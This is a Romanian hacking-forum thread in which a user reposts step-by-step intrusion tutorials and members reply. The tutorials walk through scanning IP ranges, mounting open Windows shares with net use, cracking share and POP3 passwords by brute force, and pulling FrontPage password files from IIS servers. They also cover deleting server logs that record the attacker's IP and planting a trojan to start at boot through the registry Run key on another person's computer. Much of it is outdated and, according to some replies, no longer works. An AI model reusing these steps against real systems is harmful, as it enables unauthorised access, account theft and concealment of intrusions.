Hacking and more...
HaCkinG CulT
|
Lista Forumurilor Pe Tematici
|
Hacking and more... | Reguli | Inregistrare | Login
POZE HACKING AND MORE...
Nu sunteti logat.
|
Nou pe simpatie:
deiutza20
 | Femeie
21 ani
Bacau
cauta Barbat
21 - 44 ani |
|
alfonso
Grand Master
 Din: TUX land
Inregistrat: acum 17 ani
Postari: 244
|
|
Se pot obtine incredibil de multe informatii despre un server cu ajutorul tehnicii numite "port scanning".Voi prezenta in continuare principalele porturi care ofera acces la informatia de care avem nevoie.Dar ce este un port?Pe intelesul tuturor un port este ca o "conducta" prin care circula pachetele de date.Cu ajutorul acestora se realizeaza conexiunea intre doua computere dupa cum este prezentat in tabelul de mai jos:
PORT SERVICI
80,8000,8080 se ocupa de gestiunea informatiei privtoare la paginile web
21 serviciu ftp
23 serviciu telnet
25 serviciu de transmitere a mesajelor de mail
110 serviciu de primire a mesajelor de mail
139 optiunea "file and print sharing" pentru windows
Cand unul dintre aceste porturi este deschis inseamna ca pe computerul respectiv este instalat serviciul corespunzator.Daca in urma scanarii rezulta ca portul 139 este deschis atunci computerul respectiv este ca si hackerit(vezi tutorialele precedente).Daca portul 25 este seschis atunci putem trimite meaje false de mail(vezi tuitorialul sendmail).Ne conectam cu urmatoarea comnda "telnet 10.45.6.6 25" unde 10.45.6.6 este adresa de IP a serverului.Nu voi insista asupra notiunii de daemon,tot ce trebuie sa stiti este ca reprezinta un program care ruleaza pe portul respectiv.Ideea este ca atunci cand vedeti un port deschis sa va conectati sa vedeti ce serviciu ruleaza pe el.
Voi prezenta in continuare unealta mea favorita de scanare a porturilor si anume FScan.exe.Il puteti lua de la tastand in motorul de cautare ce apare "Fscan" sau "scan".Optiunile sunt urmatoarele:
-?/-h - shows this help text
-a - append to output file (used in conjunction with -o option)
-b - get port banners
-c - timeout for connection attempts (ms)
-d - delay between scans (ms)
-e - resolve IP addresses to hostnames
-f - read IPs from file (compatible with output from -o)
-i - bind to given local port
-l - port list file - enclose name in quotes if it contains spaces
-n - no port scanning - only pinging (unless you use -q)
-o - output file - enclose name in quotes if it contains spaces
-p - TCP port(s) to scan (a comma separated list of ports/ranges)
-q - quiet mode, do not ping host before scan
-r - randomize port order
-t - timeout for pings (ms)
-u - UDP port(s) to scan (a comma separated list of ports/ranges)
-v - verbose mode
-z - maximum simultaneous threads to use for scanning
O traducere cred ca nu mai are rost asa ca o sa dau cateva exemple de folosire:
Example #1:
Scaneaza serverul de adresa 10.0.2.2 pentru toate porturile de la 1 la 200.
FScan -p 1-200 10.0.2.2
-------------------
Example #2:
Scaneaza serverele de IP range de la 10.0.2.2 la 10.0.2.254 pentru toate porturile de la 1 la
65535 depunand rezultatele in out.txt
FScan -p 1-65535 10.0.2.2-254 -o out.txt
-------------------
Example #3:
Scaneaza serverele de IP range de la 10.0.2.2 la 10.0.2.20 pe porturile 80, 81, 88, 8000 si
8080 fara ca sa adauge inregistrari in out.txt
FScan -aqp 80,81,88,8000,8080 -u 31337 10.0.2.2-20 -o out.txt
Celelalte optiuni le invatati si singuri dupa ce incarcati programul de la
Apropo, o comanda foarte utila este:
FScan -p 1-140 4.35.37.1-255
Aflam daca serverele ruleaza sub Unix sau Windows si daca portul 139 in cazul windowsului este deschis.
Credite: Nebunu.
_______________________________________
I'm a little TUX
|
|
| pus acum 17 ani |
|
alfonso
Grand Master
Din: TUX land
Inregistrat: acum 17 ani
Postari: 244
|
|
Hacking windows NT
In acest tutorial promit ca voi fi foarte ordonat.Am atatea sa scriu incat nu stiu ce sa scriu mai intai si iese "varza",o provocare pentru inteligenta dumneavoastra.Inainte de a incepe trebuie sa mentionez ceva foarte important.
CA SA HACKERITI CU SUCCES UN SERVER TREBUE SA AVETI ACELASI SISTEM DE OPERARE!!!!!!!
Continut:
1)Hackeriti serverul de la distanta
2)Hackeriti paginile Web gazduite de acesta
3)Infiltrati troieni peun calculator pe care aveti acces(cum ar fi calculatorul scolii).
11)In tutorialul precedent a fost prezentata o mare vulnerabilitate a windowsului si anume optiunea "file and print sharing".Programele necesare sunt nbtstat.exe(il aveti deja),net.exe(probabil il aveti si pe acesta) si nat.exe.Deoarece stiti deja ce face nbtstatul trcecem la celelalte doua programe.In exemplul nostru presupunem ca serverul are IP-ul 123.123.123.123. iar numele este server.com .IP-ul se poate afla cu ajutorul comenzii "tracert -j."Apoi se foloseste comanda "nbtstat -A 123.123.123.123. "Iata rezultatul acestei comenzi:
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
STUDENT1 <20> UNIQUE Registered
STUDENT1 <00> UNIQUE Registered
DOMAIN1 <00> GROUP Registered
DOMAIN1 <1C> GROUP Registered
DOMAIN1 <1B> UNIQUE Registered
STUDENT1 <03> UNIQUE Registered
DOMAIN1 <1E> GROUP Registered
DOMAIN1 <1D> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered
MAC Address = 00-C0-4F-C4-8C-9D
Student1 este numele computerului.Apoi dupa ce am aflat aceasta informatie tastam:
C:>net view 123.123.123.123
C:>net view \student1
Shared resources at 123.123.123.123
Share name Type Used as Comment
------------------------------------------------------------------------------
NETLOGON Disk Logon server share
Test Disk
The command completed successfully.
Asa aflam daca optiunea "file and print sharing este" activata.Apoi tastam urmatoarea comanda:
C:net use x: \123.123.123.123test
The command completed successfully.
Acum sa accesam noul disc creat si anume X:
C:net use
New connections will be remembered.
Status Local Remote Network
-------------------------------------------------------------------------------
OK X: \123.123.123.123test Microsoft Windows Network
OK \123.123.123.123test Microsoft Windows Network
The command completed successfully.
In mod normal cand gasim un calculator cu "file and print sharing" ni se cere o parola.Aceata parola o putem sparge cu ajutorul programului PQwak.exe.Rulati-l,completati formularul si apoi asteptati.Nu trebuie sa asteptati prea mult.
Acum sa prezentam programul Nat.exe,foarte preferat de hackeri.Iata optiunile acestuia:
NAT.EXE [-o filename] [-u userlist] [-p passlist] <address>
OPTIONS
-o Specifica fisierul in care se vor depune rezultatele scanarii unei "raze" de IP.
-u Specifica fisierul care contine numele de utilizatori(useri)
-p Specifica fisierul care contine parolele(password)
<address>
raza de IP care trebuie scanata.Iata un exempu.
C:nat -o vacuum.txt -u userlist.txt -p passlist.txt 204.73.131.10-204.73.131.30
Chiar daca nu "sparge" parola,totusi gaseste calculatoarele cu "file and print sharing" ceea ce este acelasi lucru pentu ca folosim programul PQwak.
2)Acesta este o lista care contine fisiere importante de pe server in relatie cu discul c:/ adica adresa fizica.
C:InetPubwwwroot <Home>
C:InetPubscripts /Scripts
C:InetPubwwwroot_vti_bin /_vti_bin
C:InetPubwwwroot_vti_bin_vti_adm /_vti_bin/_vti_adm
C:InetPubwwwroot_vti_bin_vti_aut /_vti_bin/_vti_aut
C:InetPubcgi-bin /cgi-bin
C:InetPubwwwrootsrchadm /srchadm
C:WINNTSystem32inetserviisadmin /iisadmin
C:InetPubwwwroot_vti_pvt
C:InetPubwwwrootsamplesSearchQUERYHIT.HTM Internet Information Index Server sample
C:Program FilesMicrosoft FrontPage_vti_bin
C:Program FilesMicrosoft FrontPage_vti_bin_vti_aut
C:Program FilesMicrosoft FrontPage_vti_bin_vti_adm
C:WINNTSystem32inetserviisadminhtmldocsadmin.htm /iisadmin/isadmin
Stiind aceste lucruri putem hackeri serverul via html(adica putem schimba paginile web).Intai trebuie sa testam cu ajutorul telnetului existenta acestor "rute".
c:/windows>telnet 123.123.123.212 80(telnet pe serverul cu adresa 123.123.123.123 pe portul 80) si dam comenzile:
GET /_vti_inf.html -------ne asiguram ca este instalat frontpage
GET /_vti_pvt/service.pwd-------ne asiguram daca exista un fisier cu parola
GET /_vti_pvt/authors.pwd ----numai pentru servere Netscape(contine parola si userul criptate)-folositi "john the ripper"
GET /_vti_pvt/administrators.pwd
GET /_vti_log/author.log -----dupa ce patrundem pe server acest fisier trebuie sters sau schimbat deoarece contine adresa voastra IP
Deschidem Frontpage Explorer sau Frontage Express (pentru Windows 95) ,optiunea OPEN si selectam pagina dorita aflata la distanta http:// (restul completam noi).Puteti incerca asa cu pagina mea,completind in rubrica "location" vi se va cere parola dar Windows NT este foarte vulnerabil.Pagina mea de la home.ro nu se afla gazduita peun server sub Windows,asa ca nu ncercati numic,v-ati putea pierde contul de NET ;).
3)Un troian este un program cu ajutorul caruia puteti patrunde pe calculatorul altei persoane.Un asemenea program este compus din doua fisiere executabile(server.exe si client.exe.).Server.exe trebuie rulat pe calculatorul fraierului iar cu ajutorul programului client.exe va conectati.Daca aveti acces la un calculator trebuie sa instalati programul astfel incat sa fie rulat la butarea calculatorului.E mai smplu decat sa astepti sa-l ruleze cineva.Voi da doua metode:
"1" Il introduceti in calea de startup.Pentru Windows95/98 calea este c/windows/start menu/programs/startup/server.exe.
"2" Cred ca aceasta metoda este buna pentru orice fel de Windows.Creati fisierul "fisier.reg" in care scrieti secventa urmatoare:
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
"nebunu"="server.exe"
apoi il executati.Ca urmare a acestei executii se modifica registrii windowsului.Incercati cu alt program inofensiv cum ar fi notepad.exe.
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
"nebunu"="notepad.exe"
Credite: Nebunu.
Modificat de alfonso (acum 17 ani)
_______________________________________
I'm a little TUX
|
|
| pus acum 17 ani |
|
alfonso
Grand Master
Din: TUX land
Inregistrat: acum 17 ani
Postari: 244
|
|
Conturi Dial-UP
Ne vom ocupa in acest tutorial de conturile dial-up.
Cerinte: programul Fscan pe care-l puteti lua de pe packetstorm.securify.com
Continut:
1)Strangerea de informatii(partea cea mai grea de fapt)
2)Atacul propriu zis.
3)contul dial-up in registrii windows-ului
1)Majoritatea firmelor distribuitoare de Internet de la noi din tara prezinta o mare vulnerabilitate,aceea de a asigna numele utilizatorului folosit pentru conexiunea la internet,unei adrese de mail.Spre exemplu ISP-ul meu este
firma ISP(doar un exemplu) iar userul meu folosit pentru conectare este "nebunu".Atunci adresa mea de mail este sau .ro.Deci daca aflu parola de la mail aflu si parola folosita pentru dial-up.
Stiti cred din tutorialele anterioare ca serverul pe care se afla mesajele primite are portul 110 deschis.iar cel folosit la transmiterea mesajelor are portul 25 deschis.Pe noi ne intereseaza portul 110.Dar cum aflam care este
adresa serverului pe care se afla mesajele?Simplu.Intai aflam IP-ul providerului de internet,tastand:
tracert -j
Presupunem ca IP-ul gasit este 154.14.14.25.Pentru afla care este serverul de receptie a mesajelor scanam IP-urile pe o raza care sa incadreze ultimul numar al IP-ului providerului,in cazul nostru pentru portul 110.Dar nu
strica sa stim daca are si portul 79 deschis....;).
fscan -vbp 79,110 154.14.14.1-254
Presupunem ca IP-ul gasit este 154.14.14.144.Ca se ne convingem ca intr-adevar
este serverul cautat,lansam din Start/Run urmatoarea comanda:
telnet 154.14.14.144 110
Dupa ce ne conectam tastam
user blahbla
si vom primi ceva de genul +OK apoi tastam
pass blabla
si vom primi un mesaj de eroare.Ne-am convins ca acesta este serverul!.
Daca cumva aveti un cont la firma respectiva puteti sa va conectati asa:
telnet server_de primire 110
user userul_tau
pass parola_ta
si iti poti citi mail-ul folosind telnetul.
2)Daca stim userul mai trebuie sa aflam parola pentru a intra in posesia contului.Pentru asta folosim un
program de brute force(Brutus.Unsecure,WWWhack etc).Le gasiti folosind motorul de cautare.In general lungimea parolei trebuie sa depaseasca 5 caractere,asa ca nu merge cu optiunea "brute force".Construiti-va un dictionar de parole care sa corespunda unui alt dictionar care sa cuprinda userii.Intai incercati daca userul si parola nu sunt identice,am intalnit
cazuri din astea.Ca sa aflati direct user-ul intrati pe un chat,si folositi optiunea "cenzurat" a programului mIRC.
Posibilitatile sunt nesfarsite,incercati...:).
3)Evident ca tot ce tastam ramane stocat in registrii windowsului.Pentru a afla datele despre conexiune deschidem meniul Start optiunea Run si tastam Regedit.Datele despre conexiune se afla la
H_KEY_CURRENT_USER/REMOTE ACCESS/PROFILE/"numele conexiunii"
Puteti afla astel userul dar parola este in binar si poate fi convertita usor,o sa scriu curand un tutorial despre asta.
*Inteleg ca va place ce cititi dar va rog sa mai si votati pentru ca ma simt prost de tot cand sunt la concurenta cu niste site-uri porno tocmai pe locul 127. *
Credite: Nebunu.
daca mai vrea cinva mai am...
Modificat de alfonso (acum 17 ani)
_______________________________________
I'm a little TUX
|
|
| pus acum 17 ani |
|
krieg38
Grand Master
 Inregistrat: acum 18 ani
Postari: 229
|
|
Mai mege faza aia cun NetBios-ul ca eu am incercat mai de mult pe un Xp si nu mi-o mers.
Modificat de krieg38 (acum 17 ani)
|
|
| pus acum 17 ani |
|
alfonso
Grand Master
Din: TUX land
Inregistrat: acum 17 ani
Postari: 244
|
|
nuj...acu le incerc si eu... 
_______________________________________
I'm a little TUX
|
|
| pus acum 17 ani |
|
Dynamyc
Elite Member
 Din: de peste tot
Inregistrat: acum 18 ani
Postari: 836
|
|
sunt facute de tine alfonso, sau?
puteai sa le pui si tu la n00bs, si cred ca au mai fost postate odata tutorialele lui nebunu
Modificat de Dynamyc (acum 17 ani)
_______________________________________
|
|
| pus acum 17 ani |
|
alfonso
Grand Master
Din: TUX land
Inregistrat: acum 17 ani
Postari: 244
|
|
1.nu sunt facute de mn 
2.scz daca nu am postat
_______________________________________
I'm a little TUX
|
|
| pus acum 17 ani |
|
|
hfhun
Elite Member
Inregistrat: acum 18 ani
Postari: 593
|
|
|
| pus acum 17 ani |
|
byjunior
Elite Member
 Din: Your PC
Inregistrat: acum 18 ani
Postari: 651
|
|
sunt ptr win 98,nu?
_______________________________________
Tv online
|
|
| pus acum 17 ani |
|
KinG
Little Kevin
 Inregistrat: acum 17 ani
Postari: 79
|
|
Alfonso nu merge asta
_______________________________________
|
|
| pus acum 17 ani |
|
alfonso
Grand Master
Din: TUX land
Inregistrat: acum 17 ani
Postari: 244
|
|
..cred ca e bun asta ...nu stiu la ce tut...nici eu nu le-am incercat pe toate..le-am pus ca ma gandesc ca poate ar fi bine sa fie aici
Modificat de alfonso (acum 17 ani)
_______________________________________
I'm a little TUX
|
|
| pus acum 17 ani |
|
Dynamyc
Elite Member
Din: de peste tot
Inregistrat: acum 18 ani
Postari: 836
|
|
exact, majoritatea sunt pt win98
Modificat de Dynamyc (acum 17 ani)
_______________________________________
|
|
| pus acum 17 ani |
|
|
darck
Membru nou
Inregistrat: acum 17 ani
Postari: 1
|
|
un link bun catre Fscan nu se gaseste?eu nu am reusit sa il gasesc pe nicaieri
|
|
| pus acum 17 ani |
|
Dynamyc
Elite Member
Din: de peste tot
Inregistrat: acum 18 ani
Postari: 836
|
|
sunt atatea programe de scanat ... intra pe
si alege-ti
_______________________________________
|
|
| pus acum 17 ani |
|
